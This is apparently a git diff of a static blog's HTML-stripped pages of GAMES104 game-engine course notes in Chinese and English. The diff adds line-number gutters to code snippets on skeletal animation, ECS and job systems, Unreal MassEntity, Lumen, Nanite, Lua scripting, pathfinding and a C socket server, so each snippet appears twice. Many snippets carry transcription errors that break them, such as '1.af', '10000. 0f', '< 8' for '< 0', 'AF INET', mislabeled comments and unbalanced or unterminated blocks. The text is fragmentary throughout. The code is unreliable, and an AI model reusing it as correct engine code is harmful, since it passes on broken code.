        const string m_joint name; // the name of joint
        UInt8m_parent_joint_index; // the index of parent joint or 0xFF if root
        Translation m_bind_pose_translation; // bind pose:translation
        Rotation m_bind_pose_rotation; // bind pose:scale
        Matrix4X3m_inverse_bind_pose_transform; // inverse bind pose 可以通过计算得到,不过为了节省时间,事先算好
        }

        struct Skeleton {
        UInt m_joint_count; // number of iointsm joints
        Joint m_joints[]; // array of joints
        };
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        struct Joint {
        const string m_joint name; // the name of joint
        UInt8m_parent_joint_index; // the index of parent joint or 0xFF if root
        Translation m_bind_pose_translation; // bind pose:translation
        Rotation m_bind_pose_rotation; // bind pose:scale
        Matrix4X3m_inverse_bind_pose_transform; // inverse bind pose 可以通过计算得到,不过为了节省时间,事先算好
        }

        struct Skeleton {
        UInt m_joint_count; // number of iointsm joints
        Joint m_joints[]; // array of joints
        };

        Skinning Matrix Palette

        ​ 蒙皮矩阵调色板

        An array of skinning matrices for each joint

        @@ -1654,7 +1652,7 @@

        ​ Remove those frames which can be fitted by linear interpolation of adjacent frames

        ​ 删除那些可以通过相邻帧线性插值拟合的帧

        -
        KeyFrame = {}
        for i = 1 to n-1 do
        frame_interp = Lerp(frame[i-1],frame[i+1])
        error = Diff(frame[i],frame_interp)
        if isNotAcceptable(error) then
        KeyFrame.insert(frame[i])
        end
        end
        +
        1
        2
        3
        4
        5
        6
        7
        8
        KeyFrame = {}
        for i = 1 to n-1 do
        frame_interp = Lerp(frame[i-1],frame[i+1])
        error = Diff(frame[i],frame_interp)
        if isNotAcceptable(error) then
        KeyFrame.insert(frame[i])
        end
        end

        Catmul-Rom Spline

        ​ Catmul-Rom 样条线(有损压缩)

        webp

        @@ -2164,7 +2162,7 @@

        ASM Definition

    -
    class ActionstateMachineclipNode
    {
    Animationclip m_clip;
    bool m_is_loop;
    };

    class ActionstateMachineBlendSpaceNode
    {
    Blendspace m_blend_space;
    bool m_is_loop;
    };
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    class ActionstateMachineclipNode
    {
    Animationclip m_clip;
    bool m_is_loop;
    };

    class ActionstateMachineBlendSpaceNode
    {
    Blendspace m_blend_space;
    bool m_is_loop;
    };
    • Transition type

      @@ -6905,6 +6903,8 @@

      目录

      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/GAMES104-Basic Elements/index.html b/posts/GAMES104-Basic Elements/index.html index ebc4ea869a..5d40e6c461 100644 --- a/posts/GAMES104-Basic Elements/index.html +++ b/posts/GAMES104-Basic Elements/index.html @@ -44,8 +44,6 @@ - - @@ -1290,7 +1288,7 @@

      Game Object

      png

      ​ 将 property 用变量定义,behavior 用函数定义。

      -
      class Drone
      {
      public:
      /* Properties */
      Vector3 position;
      float health;
      float fuel;
      ...
      /* Bebavior */
      void move();
      void scout();
      ...
      };
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      class Drone
      {
      public:
      /* Properties */
      Vector3 position;
      float health;
      float fuel;
      ...
      /* Bebavior */
      void move();
      void scout();
      ...
      };

      Drone vs. Armed Drone

      png

      ​ 这个时候我们想设计一个战斗无人机,比起一般无人机,多了 ammo 弹药的 property 和 fire 的 behaviour。

      @@ -5489,6 +5487,8 @@

      目录

      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/GAMES104-Data-Oriented Programming and Job System/index.html b/posts/GAMES104-Data-Oriented Programming and Job System/index.html index 9358e875ce..45ae125403 100644 --- a/posts/GAMES104-Data-Oriented Programming and Job System/index.html +++ b/posts/GAMES104-Data-Oriented Programming and Job System/index.html @@ -44,8 +44,6 @@ - - @@ -576,7 +574,7 @@

      while(job_count < 100) {
      doSomething();
      job_count++;
      }
      +
      1
      2
      3
      4
      while(job_count < 100) {
      doSomething();
      job_count++;
      }
      • Read job_count

        @@ -913,7 +911,7 @@

        Stackful Corou

      • 示例代码:

        -
        cppCopy Code#include <iostream>
        #include <thread>

        void worker() {
        for (int i = 0; i < 10; ++i) {
        std::cout << "Working...\n";
        std::this_thread::yield(); // 让出线程执行权
        }
        }

        int main() {
        std::thread t(worker);
        t.join();
        return 0;
        }
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        cppCopy Code#include <iostream>
        #include <thread>

        void worker() {
        for (int i = 0; i < 10; ++i) {
        std::cout << "Working...\n";
        std::this_thread::yield(); // 让出线程执行权
        }
        }

        int main() {
        std::thread t(worker);
        t.join();
        return 0;
        }

    • @@ -1182,7 +1180,7 @@

      ​ 为了找到玩家攻击敌人的代码逻辑,有可能从继承树中套好几层才找到代码。

      Problems of OOP : Messy Based Class

      面向对象编程的问题:基于混乱的类

      -
      classENGINE_API AActor: publicUObject
      {
      ...
      constFTransform&GetTransform() const;
      constFTransform&ActorToWorld() const;
      FVectorGetActorForwardVector() const;
      FVectorGetActorUpVector() const;
      FVectorGetActorRightVector() const;
      virtualvoidGetActorBounds(...) const;
      virtualFVectorGetVelocity() const;
      floatGetDistanceTo(constAActor*OtherActor) const;
      virtualvoidSetActorHiddenInGame(boolbNewHidden);
      boolGetActorEnableCollision() const;
      boolHasAuthority() const;
      UActorComponent*AddComponent(...);
      voidAttachToActor(...);
      voidDetachFromActor(constFDetachmentTransformRules&DetachmentRules);
      boolGetTickableWhenPaused();
      boolIsActorInitialized() const;
      voidReceiveAnyDamage(...);
      voidGetOverlappingActors(...) const;
      virtualvoidSetLifeSpan(floatInLifespan);
      virtualvoidSerialize(FArchive&Ar) override;
      virtualvoidPostLoad() override;
      ...
      }
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      classENGINE_API AActor: publicUObject
      {
      ...
      constFTransform&GetTransform() const;
      constFTransform&ActorToWorld() const;
      FVectorGetActorForwardVector() const;
      FVectorGetActorUpVector() const;
      FVectorGetActorRightVector() const;
      virtualvoidGetActorBounds(...) const;
      virtualFVectorGetVelocity() const;
      floatGetDistanceTo(constAActor*OtherActor) const;
      virtualvoidSetActorHiddenInGame(boolbNewHidden);
      boolGetActorEnableCollision() const;
      boolHasAuthority() const;
      UActorComponent*AddComponent(...);
      voidAttachToActor(...);
      voidDetachFromActor(constFDetachmentTransformRules&DetachmentRules);
      boolGetTickableWhenPaused();
      boolIsActorInitialized() const;
      voidReceiveAnyDamage(...);
      voidGetOverlappingActors(...) const;
      virtualvoidSetLifeSpan(floatInLifespan);
      virtualvoidSerialize(FArchive&Ar) override;
      virtualvoidPostLoad() override;
      ...
      }

      Parts of methods of a “messy base class”

      “混乱的基层”的部分方法(代码可读性差)

      Find some methods in common? Put it to the base class! → We get a messy base class

      @@ -1330,9 +1328,9 @@

      pythonCopy Codeclass Player:
      def __init__(self, x, y):
      self.x = x
      self.y = y

      def move(self, dx, dy):
      self.x += dx
      self.y += dy
      +
      1
      2
      3
      4
      5
      6
      7
      8
      pythonCopy Codeclass Player:
      def __init__(self, x, y):
      self.x = x
      self.y = y

      def move(self, dx, dy):
      self.x += dx
      self.y += dy

      ​ 而在面向数据编程(DOP)中,你会将实体的属性分开存储,并编写独立的函数来操作这些属性:

      -
      pythonCopy Code  # 使用列表存储所有玩家的位置数据
      player_positions = [(0, 0), (5, 5), (10, 10)]

      def move_player(index, dx, dy):
      x, y = player_positions[index]
      player_positions[index] = (x + dx, y + dy)

      # 移动第一个玩家
      move_player(0, 1, 1)
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      pythonCopy Code  # 使用列表存储所有玩家的位置数据
      player_positions = [(0, 0), (5, 5), (10, 10)]

      def move_player(index, dx, dy):
      x, y = player_positions[index]
      player_positions[index] = (x + dx, y + dy)

      # 移动第一个玩家
      move_player(0, 1, 1)

      ​ 在这个例子中,player_positions 列表存储所有玩家的位置数据。move_player 函数则直接操作这些数据,不涉及复杂的对象方法。这种方式可以提高性能,尤其是在处理大量数据时,因为它减少了对象的开销,并且更容易进行批量操作和并行处理。

      Instructions are Data Too

      @@ -1406,21 +1404,21 @@

      Branch predictio

      避免分支预测错误

    -
    int a[10] = {2, 5, 8, 11, 3, 12, 9, 22, 5, 13};
    for(int i = 0; i < 10; i++)
    {
    if(a[i] > 10)
    {
    doFunc1();
    }
    else
    {
    doFunc2();
    }
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    int a[10] = {2, 5, 8, 11, 3, 12, 9, 22, 5, 13};
    for(int i = 0; i < 10; i++)
    {
    if(a[i] > 10)
    {
    doFunc1();
    }
    else
    {
    doFunc2();
    }
    }

    webp

    ​ 如果代码跳着执行,则 Cache 容易未命中,降低运行速度。

    -
    int a[10] = {2, 3, 5, 5, 8, 9, 11, 12, 13, 22};
    for(int i = 0; i< 10; i++)
    {
    if(a[i] > 10)
    {
    doFunc1();
    }
    else
    {
    doFunc2();
    }
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    int a[10] = {2, 3, 5, 5, 8, 9, 11, 12, 13, 22};
    for(int i = 0; i< 10; i++)
    {
    if(a[i] > 10)
    {
    doFunc1();
    }
    else
    {
    doFunc2();
    }
    }

    webp

    ​ 如果事先将序列排序好,代码就不会跳着执行。

    Existential Processing

    存在加工

    -
    for actor in actor_array do
    if actor is alive then
    aliveFunc(actor)
    else
    deadFunc(actor)
    end
    end
    +
    1
    2
    3
    4
    5
    6
    7
    for actor in actor_array do
    if actor is alive then
    aliveFunc(actor)
    else
    deadFunc(actor)
    end
    end

    This code also faces branch prediction problems

    此代码还面临分支预测问题

    Unlike the example before, actor_array changes every tick

    与前面的示例不同,actor_array 每一刻都会发生变化

    -
    for actor in alive_actor_array do
    aliveFunc(actor)
    end

    for actor in dead_actor_array do
    deadFunc(actor)
    end
    +
    1
    2
    3
    4
    5
    6
    7
    for actor in alive_actor_array do
    aliveFunc(actor)
    end

    for actor in dead_actor_array do
    deadFunc(actor)
    end

    Completely avoid “if-else”

    完全避免“if-else”

    By maintaining 2 lists of different actors, we could avoid branch mis-precondition

    @@ -1540,7 +1538,7 @@

    Unity ECS –System

    Unity ECS——系统

    webp

    -
    public class MoveSystem: SystemBase
    {
    protected override void OnUpdate()
    {
    // For each entity which has Translation and Velocity
    Entities.ForEach(
    // Write to Displacement (ref), read Velocity (in)
    (refTranslationtrans, inVelocityvelocity) =>
    {
    // Execute for each selected entity
    trans = newTranslation()
    {
    // dT is a captured variable
    Value = trans.Value + velocity.Value * dT};
    }
    ).ScheduleParallel(); // Schedule as a parallel job
    }
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    public class MoveSystem: SystemBase
    {
    protected override void OnUpdate()
    {
    // For each entity which has Translation and Velocity
    Entities.ForEach(
    // Write to Displacement (ref), read Velocity (in)
    (refTranslationtrans, inVelocityvelocity) =>
    {
    // Execute for each selected entity
    trans = newTranslation()
    {
    // dT is a captured variable
    Value = trans.Value + velocity.Value * dT};
    }
    ).ScheduleParallel(); // Schedule as a parallel job
    }
    }

    Unity C# Job System

    Unity C# 任务系统

    Make it easier forusers to write correct multithreaded code

    @@ -1555,9 +1553,9 @@

    Unity C# Jo

    作业在运行之前可以依赖其他作业来完成

    -
    public struct FirstJob: IJob
    {
    publicvoidExecute()
    {
    ...
    }
    }

    public struct SecondJob: IJob
    {
    public void Execute()
    {
    ...
    }
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    public struct FirstJob: IJob
    {
    publicvoidExecute()
    {
    ...
    }
    }

    public struct SecondJob: IJob
    {
    public void Execute()
    {
    ...
    }
    }
    -
    varfirst_job = newFirstJob();
    varsecond_job = newSecondJob();

    // execute first_job
    varfirst_job_handle = first_job.Schedule();

    // second_job depends on first_job to complete
    second_job.Schedule(first_job_handle);
    +
    1
    2
    3
    4
    5
    6
    7
    8
    varfirst_job = newFirstJob();
    varsecond_job = newSecondJob();

    // execute first_job
    varfirst_job_handle = first_job.Schedule();

    // second_job depends on first_job to complete
    second_job.Schedule(first_job_handle);

    Unity C# Job System–Native Container

    Unity C# 作业系统——原生容器

    @@ -1577,7 +1575,7 @@

    // Allocate one float with "TempJob" policy
    // Allocator.Temp: Fastest allocation, lifespan is 1 frame or fewer
    // Allocator.TempJob: Slower than Temp, lifespan is 4 frames
    // Allocator.Persistent: Slowest allocation, can last as long as needed
    NativeArray<float> a= newNativeArray<float>(1, Allocator.TempJob);
    ...
    // Need to dispose manually for unmanaged memory
    a.Dispose();
    +
    1
    2
    3
    4
    5
    6
    7
    8
    // Allocate one float with "TempJob" policy
    // Allocator.Temp: Fastest allocation, lifespan is 1 frame or fewer
    // Allocator.TempJob: Slower than Temp, lifespan is 4 frames
    // Allocator.Persistent: Slowest allocation, can last as long as needed
    NativeArray<float> a= newNativeArray<float>(1, Allocator.TempJob);
    ...
    // Need to dispose manually for unmanaged memory
    a.Dispose();

    Unity C# Job System –Safety System

    Unity C# 作业系统-安全系统

    Support safety checks (out of bounds checks, deallocation checks, race condition checks) for jobs

    @@ -1594,7 +1592,7 @@

    public struct Job: IJob
    {
    public float a;
    public float b;
    public void Execute()
    {
    ...
    }
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    public struct Job: IJob
    {
    public float a;
    public float b;
    public void Execute()
    {
    ...
    }
    }

    webp

    High-Performance C# and Burst Compiler

    高性能 C# 和 Burst 编译器

    @@ -1651,9 +1649,9 @@

    MassEn -
    struct FMassEntityHand1e
    {
    ...
    int32 Index = 0;
    int32 SerialNumber = 0;
    ...
    }
    +
    1
    2
    3
    4
    5
    6
    7
    struct FMassEntityHand1e
    {
    ...
    int32 Index = 0;
    int32 SerialNumber = 0;
    ...
    }
    -
    struct MASSENTITY_API FMassEntityManager
    {
    ...
    TChunkedArray<FEntityData> Entities;
    TArray<int32> EntityFreeIndexList;
    ...
    }
    +
    1
    2
    3
    4
    5
    6
    7
    struct MASSENTITY_API FMassEntityManager
    {
    ...
    TChunkedArray<FEntityData> Entities;
    TArray<int32> EntityFreeIndexList;
    ...
    }

    MassEntity–Component

    MassEntity——组件

    @@ -1671,7 +1669,7 @@

    标签是用于过滤不必要处理的常量布尔组件

    -
    struct FMassArchetypeCompositionDescriptor
    {
    ...
    FMassFragmentBitSetFragments;
    FMassTagBitSetTags;
    FMassChunkFragmentBitSetChunkFragments;
    FMassSharedFragmentBitSetSharedFragments;
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    struct FMassArchetypeCompositionDescriptor
    {
    ...
    FMassFragmentBitSetFragments;
    FMassTagBitSetTags;
    FMassChunkFragmentBitSetChunkFragments;
    FMassSharedFragmentBitSetSharedFragments;
    }

    webp

    MassEntity–Systems

    MassEntity——系统

    @@ -1685,7 +1683,7 @@

    Mass

    两个重要的接口:ConfigureQueries()Execute(…)

    -
    class MASSENTITY_API UMassProcessor: publicUObject
    {
    ...
    protected:
    virtual void ConfigureQueries() PURE_VIRTUAL(UMassProcessor::ConfigureQueries);
    virtual void PostInitProperties() override;
    virtual void Execute(
    FMassEntityManager&EntityManager,
    FMassExecutionContext&Context) PURE_VIRTUAL(UMassProcessor::Execute);
    ...
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    class MASSENTITY_API UMassProcessor: publicUObject
    {
    ...
    protected:
    virtual void ConfigureQueries() PURE_VIRTUAL(UMassProcessor::ConfigureQueries);
    virtual void PostInitProperties() override;
    virtual void Execute(
    FMassEntityManager&EntityManager,
    FMassExecutionContext&Context) PURE_VIRTUAL(UMassProcessor::Execute);
    ...
    }

    MassEntity–Fragment Query

    MassEntity——片段查询

      @@ -1703,7 +1701,7 @@

      -
      void UMassApplyMovementProcessor::ConfigureQueries()
      {
      EntityQuery.AddRequirement<FMassVelocityFragment>(EMassFragmentAccess::ReadWrite);
      EntityQuery.AddRequirement<FTransformFragment>(EMassFragmentAccess::ReadWrite);
      EntityQuery.AddRequirement<FMassForceFragment>(EMassFragmentAccess::ReadWrite);
      EntityQuery.AddTagRequirement<FMassOffLODTag>(EMassFragmentPresence::None);
      EntityQuery.AddConstSharedRequirement<FMassMovementParameters>(EMassFragmentPresence::All);
      }
      +
      1
      2
      3
      4
      5
      6
      7
      8
      void UMassApplyMovementProcessor::ConfigureQueries()
      {
      EntityQuery.AddRequirement<FMassVelocityFragment>(EMassFragmentAccess::ReadWrite);
      EntityQuery.AddRequirement<FTransformFragment>(EMassFragmentAccess::ReadWrite);
      EntityQuery.AddRequirement<FMassForceFragment>(EMassFragmentAccess::ReadWrite);
      EntityQuery.AddTagRequirement<FMassOffLODTag>(EMassFragmentPresence::None);
      EntityQuery.AddConstSharedRequirement<FMassMovementParameters>(EMassFragmentPresence::All);
      }

      MassEntity–Execute

      MassEntity——执行

      webp

      @@ -5859,6 +5857,8 @@

      目录

      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/GAMES104-Dynamic Global Illumination and Lumen/index.html b/posts/GAMES104-Dynamic Global Illumination and Lumen/index.html index 82e2b68ea9..e865e8a3ea 100644 --- a/posts/GAMES104-Dynamic Global Illumination and Lumen/index.html +++ b/posts/GAMES104-Dynamic Global Illumination and Lumen/index.html @@ -44,8 +44,6 @@ - - @@ -1000,7 +998,7 @@

      Hierachical

    webp

    -
    level = 0;
    while(level > -1)
    {
    stepcurrentcell();
    if (above z plane) level++;
    if (below z plane) level--;
    }
    +
    1
    2
    3
    4
    5
    6
    7
    level = 0;
    while(level > -1)
    {
    stepcurrentcell();
    if (above z plane) level++;
    if (below z plane) level--;
    }

    webp

    Ray Reuse among Neighbor Pixels

    相邻像素间的光线复用

    @@ -1361,7 +1359,7 @@

    Mesh card –orthogonal camera on 6-Axis Aligned directions

    网格卡——6 轴对齐方向上的正交相机

    -
    class FLumenCard
    {
    FLumenCardOBB LocalOBB;
    FLumenCardOBB WorldOBB;
    uint8 AxisAliqnedDirectionIndex;
    }
    +
    1
    2
    3
    4
    5
    6
    class FLumenCard
    {
    FLumenCardOBB LocalOBB;
    FLumenCardOBB WorldOBB;
    uint8 AxisAliqnedDirectionIndex;
    }

    webp

    webp

    Generate Surface Cache

    @@ -1433,7 +1431,7 @@

    Genera

    compress from 320mb to 88mb

    从 320mb 压缩到 88mb

    -
    static FLumenSurfaceLayerConfig Configs[(uint32)ELumenSurfaceCacheLayer::MAX]
    {
    {TEXT("Depth"), PF_G16, PF_Unknown, PF_Unknown, FVector(1.af,0.0f,0.0f)},
    {TEXT("Albedo"), PF_R8G8B8A8,PF_BC7, PF_R32G32B32A32_UINT, FVector(0.0f,0.0f,0.0f)},
    {TEXT("Opacity"), PF_G8, PF_BC4, PF_R32G32B32A32_UINT, FVector(1.0f,0.0f,0.0f)},
    {TEXT("Normal"), PF_R8G8, PF_BC5, PF_R32G32A32_UINT, FVector(0.0f,0.0f,0.0f)},
    {TEXT("Emissive"), PF_BC4, PF_FloatR11G11B10, PF_BC6H, PF_R32G32B32A32_UINT, FVector(0.0f,0.0f,0.0f)}
    };
    +
    1
    2
    3
    4
    5
    6
    7
    8
    static FLumenSurfaceLayerConfig Configs[(uint32)ELumenSurfaceCacheLayer::MAX]
    {
    {TEXT("Depth"), PF_G16, PF_Unknown, PF_Unknown, FVector(1.af,0.0f,0.0f)},
    {TEXT("Albedo"), PF_R8G8B8A8,PF_BC7, PF_R32G32B32A32_UINT, FVector(0.0f,0.0f,0.0f)},
    {TEXT("Opacity"), PF_G8, PF_BC4, PF_R32G32B32A32_UINT, FVector(1.0f,0.0f,0.0f)},
    {TEXT("Normal"), PF_R8G8, PF_BC5, PF_R32G32A32_UINT, FVector(0.0f,0.0f,0.0f)},
    {TEXT("Emissive"), PF_BC4, PF_FloatR11G11B10, PF_BC6H, PF_R32G32B32A32_UINT, FVector(0.0f,0.0f,0.0f)}
    };

    View Dependent Per-Object Card Resolution

    查看每对象卡分辨率

    128 x 128 physical pages in a 4096 x 4096 atlas

    @@ -1697,7 +1695,7 @@

    Screen Space P

    Octahedron mapping

    八面体映射

    webp

    -
    float2 unitVectorTo0ctahedron(float3 N)
    {
    N.xy /= dot(1, abs(N));
    if(N.z<= 0)
    {
    x_factor = N.x >= 0 ? 1.0 : -1.0;
    y_factor = N.y >= 0 ? 1.0 : -1.0;
    N.xy = (1 - abs(N.yx)) * float2(x_factor, y_factor);
    return float2(N.xy);
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    float2 unitVectorTo0ctahedron(float3 N)
    {
    N.xy /= dot(1, abs(N));
    if(N.z<= 0)
    {
    x_factor = N.x >= 0 ? 1.0 : -1.0;
    y_factor = N.y >= 0 ? 1.0 : -1.0;
    N.xy = (1 - abs(N.yx)) * float2(x_factor, y_factor);
    return float2(N.xy);
    }

    Screen Probe Placement

    屏幕探头放置

      @@ -1716,7 +1714,7 @@

      Detect Non-Interpolatable Cases

      检测不可插值的案例

      -
      float4 PlaneDistances;
      PlaneDistances.x = abs(dot(float4(Position00, -1), ScenePlane));
      PlaneDistances.y = abs(dot(float4(Position10, -1), ScenePlane));
      PlaneDistances.z = abs(dot(float4(Position01, -1), ScenePlane));
      PlaneDistances.w = abs(dot(float4(Position11, -1), ScenePlane));

      float4 RelativeDepthDifference = PlaneDistances / SceneDepth;

      Depthweights = CornerDepths > 0 ? exp2(-10000. 0f * (RelativeDepthDifference * RelativeDepthDifference)) : 0;

      InterpolationWeights = float4(
      (1-BilinearWeights.y) * (1-BilinearWeights.x),
      (1-BilinearWeights.y) * BilinearWeights.x,
      BilinearWeights.y * (1 - BilinearWeights.x),
      BilinearWeights.y * BilinearWeights.x);
      InterpolationWeights *= DepthWeights;

      float Epsilon = .01f;
      ScreenProbeSample.Weights /= max(dot(ScreenProbeSample.Weights, 1), Epsilon);
      float LightingIsValid = (dot(ScreenProbeSample.Weights, .1) < 1.0f - Epsilon) ? 0.0f : 1.0f.
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      float4 PlaneDistances;
      PlaneDistances.x = abs(dot(float4(Position00, -1), ScenePlane));
      PlaneDistances.y = abs(dot(float4(Position10, -1), ScenePlane));
      PlaneDistances.z = abs(dot(float4(Position01, -1), ScenePlane));
      PlaneDistances.w = abs(dot(float4(Position11, -1), ScenePlane));

      float4 RelativeDepthDifference = PlaneDistances / SceneDepth;

      Depthweights = CornerDepths > 0 ? exp2(-10000. 0f * (RelativeDepthDifference * RelativeDepthDifference)) : 0;

      InterpolationWeights = float4(
      (1-BilinearWeights.y) * (1-BilinearWeights.x),
      (1-BilinearWeights.y) * BilinearWeights.x,
      BilinearWeights.y * (1 - BilinearWeights.x),
      BilinearWeights.y * BilinearWeights.x);
      InterpolationWeights *= DepthWeights;

      float Epsilon = .01f;
      ScreenProbeSample.Weights /= max(dot(ScreenProbeSample.Weights, 1), Epsilon);
      float LightingIsValid = (dot(ScreenProbeSample.Weights, .1) < 1.0f - Epsilon) ? 0.0f : 1.0f.

      Screen Probe Atlas

      屏幕探针图谱

        @@ -1883,7 +1881,7 @@

        -
        float GetFilterPositionWeight(floatProbeDepth, float sceneDepth)
        {
        float DepthDifference = abs(ProbeDepth - SceneDepth);
        float RelativeDepthDifference = DepthDifference / sceneDepth;
        return ProbeDepth >= 0 ? exp2(-spatialFilterPositionweightscale * (RelativeDepthDifference * RelativeDepthDifference)) : 0;
        }
        +
        1
        2
        3
        4
        5
        6
        float GetFilterPositionWeight(floatProbeDepth, float sceneDepth)
        {
        float DepthDifference = abs(ProbeDepth - SceneDepth);
        float RelativeDepthDifference = DepthDifference / sceneDepth;
        return ProbeDepth >= 0 ? exp2(-spatialFilterPositionweightscale * (RelativeDepthDifference * RelativeDepthDifference)) : 0;
        }

        Denoise: Gather Radiance from neighbors

        降噪:从邻居那里收集辐射

        Gather radiance from matching Octahedral cell in neighbor probes

        @@ -6161,6 +6159,8 @@

        目录

        var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/GAMES104-Effects/index.html b/posts/GAMES104-Effects/index.html index e6ae968309..bcd2a7960c 100644 --- a/posts/GAMES104-Effects/index.html +++ b/posts/GAMES104-Effects/index.html @@ -44,8 +44,6 @@ - - @@ -5323,6 +5321,8 @@

        目录

        var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/GAMES104-GPU-Driven Geometry Pipeline-Nanite/index.html b/posts/GAMES104-GPU-Driven Geometry Pipeline-Nanite/index.html index ee738ec5f5..ceca92a911 100644 --- a/posts/GAMES104-GPU-Driven Geometry Pipeline-Nanite/index.html +++ b/posts/GAMES104-GPU-Driven Geometry Pipeline-Nanite/index.html @@ -44,8 +44,6 @@ - - @@ -2487,7 +2485,7 @@

        -
        void UnpackMaterialResolve(uint Packed,
        out bool IsNanitePixel,
        out bool IsDecalReceiver,
        out uint MaterialSlot)
        {
        IsNanitePixel = BitFieldExtractU32(Packed,10) != 0;
        MaterialSlot = BitFieldExtractU32(Packed, 14, 1);
        IsDecalReceiver = BitFieldExtractU32(Packed, 1, 15) != 0:
        +
        1
        2
        3
        4
        5
        6
        7
        8
        void UnpackMaterialResolve(uint Packed,
        out bool IsNanitePixel,
        out bool IsDecalReceiver,
        out uint MaterialSlot)
        {
        IsNanitePixel = BitFieldExtractU32(Packed,10) != 0;
        MaterialSlot = BitFieldExtractU32(Packed, 14, 1);
        IsDecalReceiver = BitFieldExtractU32(Packed, 1, 15) != 0:

        Shadows

        Micropoly Level Detail for Shadows

        阴影的微多层细节

        @@ -6851,6 +6849,8 @@

        目录

        var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/GAMES104-Gameplay/index.html b/posts/GAMES104-Gameplay/index.html index a15fb66451..180a609b39 100644 --- a/posts/GAMES104-Gameplay/index.html +++ b/posts/GAMES104-Gameplay/index.html @@ -44,8 +44,6 @@ - - @@ -712,7 +710,7 @@

        Scripting La

        沙盒运行稳定,崩溃少

      -
      function tick(delta)
      if input_system.isKeyDown(Keycode.W) then
      self:moveForward(delta)
      elseif input_system.isKeyDown(Keycode.S) then
      self:moveBackward(delta)
      end

      if input_system.iskeyDown(Keycode.MouseLeft) then
      self:fire(delta)
      end
      ...
      end
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      function tick(delta)
      if input_system.isKeyDown(Keycode.W) then
      self:moveForward(delta)
      elseif input_system.isKeyDown(Keycode.S) then
      self:moveBackward(delta)
      end

      if input_system.iskeyDown(Keycode.MouseLeft) then
      self:fire(delta)
      end
      ...
      end
      Lua Script Example

      How Script Languages Work

      ​ 脚本语言的工作原理

      @@ -1870,7 +1868,7 @@

      Dijkstra Algorithm

      -
      for each vertex v:
      dist[v] = ∞
      prev[v]= none
      dist[source]= 0
      set all vertices to unexplored
      while destination not explored:
      v = least-valued unexplored vertex
      set v to explored
      for each edge(v, w):
      if dist[v] + len(v,w) < dist[w]:
      dist[w]= dist[v]+ len(v, w)
      prev[W]=V
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      for each vertex v:
      dist[v] = ∞
      prev[v]= none
      dist[source]= 0
      set all vertices to unexplored
      while destination not explored:
      v = least-valued unexplored vertex
      set v to explored
      for each edge(v, w):
      if dist[v] + len(v,w) < dist[w]:
      dist[w]= dist[v]+ len(v, w)
      prev[W]=V

      ​ 总是能搜索到图中两点间最短距离。

      A Star (A*)

        @@ -8855,6 +8853,8 @@

        目录

        var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/GAMES104-Online Gaming Architecture/index.html b/posts/GAMES104-Online Gaming Architecture/index.html index 42a5603b51..30ed7ad933 100644 --- a/posts/GAMES104-Online Gaming Architecture/index.html +++ b/posts/GAMES104-Online Gaming Architecture/index.html @@ -44,8 +44,6 @@ - - @@ -590,7 +588,7 @@

        Socket

        A Socket is combination of an lP Address and a Port Number.

        Socket 是 IP 地址和端口号的组合。

        webp

        -
        // server side
        struct sockaddr_in saddr, caddr;
        int sockfd, clen, isock;
        unsigned short port = 80;

        if ((sockfd=Socket(AF INET,SOCK STREAM,0) < 0) {
        printf("Error creating socket\n");
        ...
        }

        memset(&saddr, '\0', sizeof(saddr)); // zero structure out
        saddr.sin family = AF INET; // match the socket() call
        saddr.sin addr.s addr = htonl(INADDR ANY); // bind to any local addresss
        addr.sin port = htons(port); // specify port to listen on

        if((bind(sockfd, (struct sockaddr *)&saddr, sizeof(saddr)) < 8) { // bind
        printf("Error binding\n");
        ...
        }

        if(listen(sockfd, 5) < 0) { // listen for incoming connections
        printf("Error listening\n");
        ...
        }

        clen=sizeof(caddr)
        if((isock=accept(sockfd, (struct sockaddr *)&caddr, &clen)) < 8) { // accept one
        printf("Error accepting\n");
        ...
        }
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        // server side
        struct sockaddr_in saddr, caddr;
        int sockfd, clen, isock;
        unsigned short port = 80;

        if ((sockfd=Socket(AF INET,SOCK STREAM,0) < 0) {
        printf("Error creating socket\n");
        ...
        }

        memset(&saddr, '\0', sizeof(saddr)); // zero structure out
        saddr.sin family = AF INET; // match the socket() call
        saddr.sin addr.s addr = htonl(INADDR ANY); // bind to any local addresss
        addr.sin port = htons(port); // specify port to listen on

        if((bind(sockfd, (struct sockaddr *)&saddr, sizeof(saddr)) < 8) { // bind
        printf("Error binding\n");
        ...
        }

        if(listen(sockfd, 5) < 0) { // listen for incoming connections
        printf("Error listening\n");
        ...
        }

        clen=sizeof(caddr)
